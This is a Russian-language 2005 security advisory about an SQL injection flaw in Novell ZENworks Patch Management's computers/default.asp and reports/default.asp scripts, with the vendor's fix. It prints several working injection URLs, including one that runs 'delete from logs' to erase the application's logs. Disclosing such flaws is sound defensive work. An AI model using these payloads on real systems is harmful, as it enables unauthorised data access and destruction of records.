Security Lab

SQL-инъекция в Novell ZENworks Patch Management

Дата публикации:01.11.2005
Всего просмотров:1440
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Novell ZENworks Patch Management 6.x
Уязвимые версии: Novell ZENworks Patch Management версии до 6.2.2.181

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в параметре "Direction" сценария "computers/default.asp" и в параметрах "SearchText", "StatusFilter" и "computerFilter" в сценарии "reports/default.asp". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+testclient.master.dbo.sysobjects

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+OPENQUERY+(+[testclient],+"
select+@@version;+delete+from+logs")Server 'testclient'
is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?sort=&
Direction=;SELECT+name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+OPENQUERY+(+[testclient],
+"select+@@version;+delete+from+logs") Server 'testclient'
is not configured for DATA ACCESS.

URL производителя: www.novell.com

Решение: Установите последнюю версию (6.2.2.181) с сайта производителя.

Источник:

Ссылки: Novell ZENworks Patch Management Server 6.0.0.52 - SQL injection